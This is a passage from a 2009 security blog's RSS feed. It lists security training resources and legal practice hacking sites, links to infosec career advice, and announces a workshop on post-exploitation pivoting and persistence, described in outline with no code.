<p><strong>Places to learn:</strong>    <br />The Academy Pro &#8211; <a href="http://www.theacademypro.com/">http://www.theacademypro.com/</a>    <br />Learn Security Online &#8211; <a href="http://www.learnsecurityonline.com/">http://www.learnsecurityonline.com/</a>    <br />Free IT Security Training &#8211; <a href="http://www.freeitsecuritytraining.com/">http://www.freeitsecuritytraining.com/</a>    <br />Virtual Training Environment by Carnegie Mellon &#8211; <a href="https://www.vte.cert.org/vteweb/">https://www.vte.cert.org/vteweb/</a></p>
<p><strong>Challenge Sites and Sites that are OK to attack:</strong>    <br />(Make sure you know which is which before you haul off and start attacking though)    <br />(Most of these stolen from Chris Nickerson’s reply to <a href="http://www.exoticliability.com/forum/topics/show-17-links">Show 17 Links blog post</a>)</p>
<p><a href="http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project">http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project</a>    <br /><a href="http://testasp.acunetix.com/Default.asp">http://testasp.acunetix.com/Default.asp</a>    <br /><a href="http://test.acunetix.com/">http://test.acunetix.com/</a>    <br /><a href="http://hackme.ntobjectives.com/">http://hackme.ntobjectives.com/</a>    <br /><a href="http://www.foundstone.com/us/resources/proddesc/hacmeshipping.htm">http://www.foundstone.com/us/resources/proddesc/hacmeshipping.htm</a>    <br /><a href="http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm">http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm</a>    <br /><a href="http://www.foundstone.com/us/resources/proddesc/hacmebooks.htm">http://www.foundstone.com/us/resources/proddesc/hacmebooks.htm</a>    <br /><a href="http://www.foundstone.com/us/resources/proddesc/hacmetravel.htm">http://www.foundstone.com/us/resources/proddesc/hacmetravel.htm</a>    <br /><a href="http://lampsecurity.org/capture-the-flag-5">http://lampsecurity.org/capture-the-flag-5</a>    <br /><a href="http://zero.webappsecurity.com/">http://zero.webappsecurity.com/</a>    <br /><a href="http://www.hackertest.net/">http://www.hackertest.net/</a>    <br /><a href="http://www.hackthissite.org/">http://www.hackthissite.org/</a>    <br /><a href="http://www.mavensecurity.com/WebMaven.php">http://www.mavensecurity.com/WebMaven.php</a>    <br /><a href="http://ha.ckers.org/challenge/">http://ha.ckers.org/challenge/</a>    <br /><a href="http://ha.ckers.org/challenge2/">http://ha.ckers.org/challenge2/</a>    <br /><a href="http://demo.testfire.net/">http://demo.testfire.net/</a>    <br /><a href="http://scanme.nmap.org/">http://scanme.nmap.org/</a>    <br /><a href="http://www.hellboundhackers.org/">http://www.hellboundhackers.org/</a>    <br /><a href="http://www.overthewire.org/wargames/">http://www.overthewire.org/wargames/</a>    <br /><a href="http://roothack.org/">http://roothack.org/</a>    <br /><a href="http://heorot.net/">http://heorot.net/</a>    <br /><a href="http://www.irongeek.com/i.php?page=security/mutillidae-deliberately...">http://www.irongeek.com/i.php?page=security/mutillidae-deliberately&#8230;</a>    <br /><a href="http://wocares.com/xsstester.php">http://wocares.com/xsstester.php</a>    <br /><a href="https://how2hack.net">https://how2hack.net</a>    <br /><a href="http://hax.tor.hu/">http://hax.tor.hu/</a>    <br /><a href="http://www.bright-shadows.net/">http://www.bright-shadows.net/</a>    <br /><a href="http://www.dareyourmind.net/">http://www.dareyourmind.net/</a>    <br /><a href="http://hackergames.net/">http://hackergames.net/</a>    <br /><a href="http://www.hackquest.com/">http://www.hackquest.com/</a>    <br /><a href="http://www.darkmindz.com/">http://www.darkmindz.com/</a>    <br /><a href="http://www.caesum.com/game/">http://www.caesum.com/game/</a>    <br /><a href="http://www.net-force.nl/">http://www.net-force.nl/</a>    <br /><a href="http://www.osix.net/">http://www.osix.net/</a>    <br /><a href="http://www.mibs-challenges.de/">http://www.mibs-challenges.de/</a>    <br /><a href="http://projecteuler.net/">http://projecteuler.net/</a>    <br /><a href="http://uva.onlinejudge.org/">http://uva.onlinejudge.org/</a>    <br /><a href="http://ace.delos.com/usacogate">http://ace.delos.com/usacogate</a></p>
<p>So now you have absolutely <em>ZERO</em> reason to have one moment of time on your hands <img src='http://www.room362.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' />     <br />Know of another good resource? Post a comment.</p>
<p><strong>UPDATE</strong>: ethicalhack3r from <a href="http://www.ethicalhack3r.co.uk">http://www.ethicalhack3r.co.uk</a> pointed me to his project called “Damn Vulnerable Web App”. You can find it on Sourceforge here: <a href="http://sourceforge.net/projects/dvwa/">http://sourceforge.net/projects/dvwa/</a></p>


<p>Related posts:<ol><li><a href='http://www.room362.com/archives/598-local-security-dc-nova-md.html' rel='bookmark' title='Permanent Link: Local Security &#8211; DC-NoVA-MD'>Local Security &#8211; DC-NoVA-MD</a> <small>Looking for local events? I&#8217;ve gotten a lot of people...</small></li><li><a href='http://www.room362.com/archives/209-sbn-move-to-lijit.html' rel='bookmark' title='Permanent Link: SBN move to Lijit'>SBN move to Lijit</a> <small>Alan posted this about the SBN: Well there is not...</small></li><li><a href='http://www.room362.com/archives/585-getting-your-fill-of-reverse-engineering-and-malware-analysis.html' rel='bookmark' title='Permanent Link: Getting your fill of Reverse Engineering and Malware Analysis'>Getting your fill of Reverse Engineering and Malware Analysis</a> <small>Matt, from the Exotic Liability forums, posed a suggestion for...</small></li></ol></p>
<p><a href="http://feedads.g.doubleclick.net/~a/k9FZ6MhbDJUJ1D3tN_sQiXaVVyA/0/da"><img src="http://feedads.g.doubleclick.net/~a/k9FZ6MhbDJUJ1D3tN_sQiXaVVyA/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/k9FZ6MhbDJUJ1D3tN_sQiXaVVyA/1/da"><img src="http://feedads.g.doubleclick.net/~a/k9FZ6MhbDJUJ1D3tN_sQiXaVVyA/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/Room362com?a=ik6_1A5netM:NHxHWDlipeQ:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=ik6_1A5netM:NHxHWDlipeQ:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/Room362com?i=ik6_1A5netM:NHxHWDlipeQ:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=ik6_1A5netM:NHxHWDlipeQ:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/Room362com?i=ik6_1A5netM:NHxHWDlipeQ:gIN9vFwOqvQ" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=ik6_1A5netM:NHxHWDlipeQ:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=ik6_1A5netM:NHxHWDlipeQ:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/Room362com?i=ik6_1A5netM:NHxHWDlipeQ:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=ik6_1A5netM:NHxHWDlipeQ:I56M4DFLkF8"><img src="http://feeds.feedburner.com/~ff/Room362com?i=ik6_1A5netM:NHxHWDlipeQ:I56M4DFLkF8" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/Room362com/~4/ik6_1A5netM" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.room362.com/archives/569-getting-your-fill-of-security.html/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Couch to Career – Follow up</title>
		<link>http://www.room362.com/archives/564-couch-to-career-follow-up.html</link>
		<comments>http://www.room362.com/archives/564-couch-to-career-follow-up.html#comments</comments>
		<pubDate>Sat, 23 May 2009 19:30:37 +0000</pubDate>
		<dc:creator>Rob Fuller</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.room362.com/?p=564</guid>
		<description><![CDATA[First of all, here is my slide deck from DojoSec with a couple added slides, words, and slight modifications:
From Couch To Career In 80 Hours 
View more OpenOffice presentations from Rob Fuller.

I have put this article off quite a few times due to some very cool and interesting things happening in our field as it applies [...]


Related posts:<ol><li><a href='http://www.room362.com/archives/543-couch-to-career-in-80-hours-or-less.html' rel='bookmark' title='Permanent Link: Couch to Career in 80 hours or less'>Couch to Career in 80 hours or less</a> <small> DojoSec Monthly Briefings &#8211; April 2009 &#8211; Rob Fuller...</small></li><li><a href='http://www.room362.com/archives/229-offensive-security-certified-professional.html' rel='bookmark' title='Permanent Link: Offensive Security Certified Professional'>Offensive Security Certified Professional</a> <small>I recently obtained the status Offensive Security Certified Professional. It...</small></li></ol>]]></description>
			<content:encoded><![CDATA[<p>First of all, here is my slide deck from DojoSec with a couple added slides, words, and slight modifications:</p>
<div id="__ss_1477627" style="width: 425px; text-align: left;"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" title="From Couch To Career In 80 Hours" href="http://www.slideshare.net/mubix/from-couch-to-career-in-80-hours?type=presentation">From Couch To Career In 80 Hours</a><object width="425" height="355" data="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=fromcouchtocareerin80hours-090523005155-phpapp02&amp;stripped_title=from-couch-to-career-in-80-hours" type="application/x-shockwave-flash"><param name="allowFullScreen" value="true" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=fromcouchtocareerin80hours-090523005155-phpapp02&amp;stripped_title=from-couch-to-career-in-80-hours" /><param name="allowfullscreen" value="true" /></object> </p>
<div style="font-size: 11px; font-family: tahoma,arial; height: 26px; padding-top: 2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">OpenOffice presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/mubix">Rob Fuller</a>.</div>
</div>
<p>I have put this article off quite a few times due to some very cool and interesting things happening in our field as it applies to getting a job. That, and <a href="http://www.mattjaysecurity.com">Matt Johansen</a> beat me to it with his blog post titled: &#8220;<a href="http://www.mattjaysecurity.com/?p=39">A lot of Information Security Career Advice</a>&#8220;, which I highly recommend you check out and add to your RSS reader.  So instead of rewriting things that other people have already covered I&#8217;ll just post the links to them:</p>
<p>We start our journey as any real hacker would, with the &#8220;<a href="http://www.rootcompromise.org/hhg/">Hacker Handle Generator</a>&#8220;.  And since I am more of an Audio/Visual Leaner  let&#8217;s start off with &#8220;<a href="http://exoticliability.libsyn.com/index.php?post_id=462895">Exotic Liability Episode 10: Advice</a>&#8221; Where Ryan Jones, DJ Jackalope, and Chris Nickerson, of &#8220;<a href="http://en.wikipedia.org/wiki/Tiger_Team_(TV_series)">Tiger Team</a>&#8221; fame, fortune and power,  call back Michigan Justin and talk at length about how to start out in the community. We also have Don Donzal from <a href="http://www.ethicalhacker.net">EthicalHacker.net</a> who talks about &#8220;<a href="http://www.ethicalhacker.net/content/view/201/24/">DIY Career in Ethical Hacking</a>&#8221; (<a href="http://www.ethicalhacker.net/images/stories/columns/editor/diycareer/donzal_diycareerinethicalhacking_sanspentestsummit2008.mp3">MP3</a> / <a href="http://www.ethicalhacker.net/images/stories/columns/editor/diycareer/diy%20career%20in%20ethical%20hacking.pdf">SLIDES</a>), and about 16 tips from &#8220;<a href="http://www.slideshare.net/jrallis/tips-from-ugly-resumes-get-jobs">Ugly Resumes get Jobs!</a>&#8221; on Slideshare. But this A/V setup wouldn&#8217;t be complete if I didn&#8217;t tell you guys where you can get all kinds of videos actually teaching you security so that you can have a leg up on everyone else. Head on over to <a href="http://www.theacademypro.com/">TheAcademyPro.com</a> where you can watch 1-5 minute videos on everything from configuring Snort and exploiting systems with Metasploit, to configuring Sourcefire 3D and destroying the world with Core Impact. Another site to bookmark is <a href="http://www.securitytube.net/">SecurityTube.net</a>. The guys there work their fingers to the bone to locate security videos across the net and put them all in one central pace for you to access.</p>
<p>Now on for those people who like to do all that &#8220;reading&#8221; stuff.  First head on over to the <a href="http://www.securitycatalyst.com/">Security Catalyst</a> for <a href="http://www.securitycatalyst.com/career-advice-for-security-geeks-part-1/">Part 1</a> and <a href="http://www.securitycatalyst.com/career-advice-for-security-geeks-part-2/">Part 2</a> of &#8220;Career Advice for Security Geeks&#8221; and Paul Asadoorian&#8217;s post titled &#8220;<a href="http://pauldotcom.com/2009/05/getting-started-in-information.html">Getting Started In Information Security How-To</a>&#8221; and Kees Leune&#8217;s post titled &#8220;<a href="http://www.leune.org/blog/kees/2008/10/-tips-for-getting-started-1.html">Tips for Getting Started in Information Security</a>&#8220;, and if you are really feeling froggy, read all 4+ years (only 6 or so pages don&#8217;t worry too much) of the discussion on the Defcon forums: &#8220;<a href="https://forum.defcon.org/showthread.php?t=3741&amp;page=1">Getting started in the security field</a>&#8221;</p>
<p>Finally, sticking with the theme that I try to keep going on this blog I want to give you something new to digest:</p>
<p>James Arlen (aka myrcurial) does a talk at Notacon about going from <a href="http://vimeo.com/4311958">BlackHat to BlackSuit</a></p>
<p>LifeHacker&#8217;s &#8220;<a href="http://lifehacker.com/5157794/top-10-tools-for-landing-a-better-job">Top 10 Tools for landing a better job</a>&#8221;</p>
<p>Aaron Crowe writes about &#8220;<a href="http://www.walletpop.com/blog/2009/05/16/how-to-avoid-being-scammed-in-a-job-hunt/">How to avoid being scammed in a job hunt</a>&#8221;</p>
<p>Lee Kushner writes about &#8220;<a href="http://www.infosecleaders.com/2009/05/career-advice-wanting-a-job-too-much/">Wanting a Job Too Much</a>&#8221;</p>
<p>Two Mashable articles: &#8220;<a href="http://mashable.com/2009/03/13/twitter-jobs/">How to find a Job on Twitter</a>&#8221; and &#8220;<a href="http://mashable.com/2009/05/19/twtbizcard/">How to exchange Biz cards on Twitter</a>&#8221;</p>
<p>But I wanted to close with some advice that a lot of people have a hard time with. And that is how to talk dollars, and how to do it well.  And Jack Chapman is certainly the guy to learn from. Check out a write-up on him on <a href="http://www.getrichslowly.org/">GetRichSlowly.org</a> titled &#8220;<a href="http://www.getrichslowly.org/blog/2009/05/06/negotiating-your-salary-how-to-make-1000-a-minute/">Negotiating Your Salary: How to Make $1,000 a Minute</a>&#8221; (which is the title of Chapman&#8217;s book). And <a href="http://salarynegotiations.com/">Chapman&#8217;s site</a> where he has tons of YouTube videos of tips that he describes in the book.</p>
<p>Sorry this is a bunch of links, and if you guys would like me to explain each slide in my Couch to Career deck I&#8217;ll make another post about it.</p>


<p>Related posts:<ol><li><a href='http://www.room362.com/archives/543-couch-to-career-in-80-hours-or-less.html' rel='bookmark' title='Permanent Link: Couch to Career in 80 hours or less'>Couch to Career in 80 hours or less</a> <small> DojoSec Monthly Briefings &#8211; April 2009 &#8211; Rob Fuller...</small></li><li><a href='http://www.room362.com/archives/229-offensive-security-certified-professional.html' rel='bookmark' title='Permanent Link: Offensive Security Certified Professional'>Offensive Security Certified Professional</a> <small>I recently obtained the status Offensive Security Certified Professional. It...</small></li></ol></p>
<p><a href="http://feedads.g.doubleclick.net/~a/XZnK7ZiQ9ILb1sd_S3tfzSSS5C8/0/da"><img src="http://feedads.g.doubleclick.net/~a/XZnK7ZiQ9ILb1sd_S3tfzSSS5C8/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/XZnK7ZiQ9ILb1sd_S3tfzSSS5C8/1/da"><img src="http://feedads.g.doubleclick.net/~a/XZnK7ZiQ9ILb1sd_S3tfzSSS5C8/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/Room362com?a=jdlsn3csx24:DIV07cNl1eg:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=jdlsn3csx24:DIV07cNl1eg:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/Room362com?i=jdlsn3csx24:DIV07cNl1eg:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=jdlsn3csx24:DIV07cNl1eg:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/Room362com?i=jdlsn3csx24:DIV07cNl1eg:gIN9vFwOqvQ" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=jdlsn3csx24:DIV07cNl1eg:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=jdlsn3csx24:DIV07cNl1eg:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/Room362com?i=jdlsn3csx24:DIV07cNl1eg:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=jdlsn3csx24:DIV07cNl1eg:I56M4DFLkF8"><img src="http://feeds.feedburner.com/~ff/Room362com?i=jdlsn3csx24:DIV07cNl1eg:I56M4DFLkF8" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/Room362com/~4/jdlsn3csx24" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.room362.com/archives/564-couch-to-career-follow-up.html/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
<enclosure url="http://www.ethicalhacker.net/images/stories/columns/editor/diycareer/donzal_diycareerinethicalhacking_sanspentestsummit2008.mp3" length="48642216" type="audio/mpeg" />
		</item>
		<item>
		<title>Workshop at ToorCamp with Dark0perator</title>
		<link>http://www.room362.com/archives/554-workshop-at-toorcamp-with-dark0perator.html</link>
		<comments>http://www.room362.com/archives/554-workshop-at-toorcamp-with-dark0perator.html#comments</comments>
		<pubDate>Tue, 05 May 2009 17:19:31 +0000</pubDate>
		<dc:creator>Rob Fuller</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.room362.com/?p=554</guid>
		<description><![CDATA[Dark0perator and I will be giving a workshop at ToorCamp coming up July 2nd-5th:
You can find us on the ToorCamp site: http://www.toorcamp.org/content/W13
Here is the description of our talk, save the bio(s):

The Art of Pivot and Persistence: 
Shell is only the beginning.
This workshop is based on the assumption that you have some level of access on [...]


Related posts:<ol><li><a href='http://www.room362.com/archives/223-random-thoughts-web-app-hacking.html' rel='bookmark' title='Permanent Link: Random Thoughts &#8211; Web App Hacking'>Random Thoughts &#8211; Web App Hacking</a> <small> SQLi through meta refreshes using cookies or useragents. Making...</small></li></ol>]]></description>
			<content:encoded><![CDATA[<p>Dark0perator and I will be giving a workshop at ToorCamp coming up July 2nd-5th:</p>
<p>You can find us on the ToorCamp site: <a href="http://www.toorcamp.org/content/W13">http://www.toorcamp.org/content/W13</a></p>
<p>Here is the description of our talk, save the bio(s):</p>
<blockquote>
<h3><strong>The Art of Pivot and Persistence: </strong></h3>
<h3><strong>Shell is only the beginning.</strong></h3>
<p>This workshop is based on the assumption that you have some level of access on a target system. From that it is demonstrated how to go from that level of access to taking over the whole company and how to keep that access, surviving reboots, AV scans, and even reimaging. The following levels of access is covered:</p>
<p>1. Domain Administrator access on a domain controller<br />
2. Local Administrator access on a client machine<br />
3. Root on a Database server<br />
4. Root on a Web server<br />
5. User on a client machine<br />
6. User on a Database server<br />
7. User on a Web server</p></blockquote>


<p>Related posts:<ol><li><a href='http://www.room362.com/archives/223-random-thoughts-web-app-hacking.html' rel='bookmark' title='Permanent Link: Random Thoughts &#8211; Web App Hacking'>Random Thoughts &#8211; Web App Hacking</a> <small> SQLi through meta refreshes using cookies or useragents. Making...</small></li></ol></p>
<p><a href="http://feedads.g.doubleclick.net/~a/EZPNOip9U_dcFpRhh3HNOgSELO8/0/da"><img src="http://feedads.g.doubleclick.net/~a/EZPNOip9U_dcFpRhh3HNOgSELO8/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/EZPNOip9U_dcFpRhh3HNOgSELO8/1/da"><img src="http://feedads.g.doubleclick.net/~a/EZPNOip9U_dcFpRhh3HNOgSELO8/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/Room362com?a=6Z5FfeESLXM:mXErVUlwFyQ:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=6Z5FfeESLXM:mXErVUlwFyQ:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/Room362com?i=6Z5FfeESLXM:mXErVUlwFyQ:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=6Z5FfeESLXM:mXErVUlwFyQ:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/Room362com?i=6Z5FfeESLXM:mXErVUlwFyQ:gIN9vFwOqvQ" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=6Z5FfeESLXM:mXErVUlwFyQ:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=6Z5FfeESLXM:mXErVUlwFyQ:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/Room362com?i=6Z5FfeESLXM:mXErVUlwFyQ:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=6Z5FfeESLXM:mXErVUlwFyQ:I56M4DFLkF8"><img src="http://feeds.feedburner.com/~ff/Room362com?i=6Z5FfeESLXM:mXErVUlwFyQ:I56M4DFLkF8" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/Room362com/~4/6Z5FfeESLXM" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.room362.com/archives/554-workshop-at-toorcamp-with-dark0perator.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss><!-- Dynamic page generated in 12.165 seconds. --><!-- Cached page generated by WP-Super-Cache on 2009-07-14 17:30:14 -->
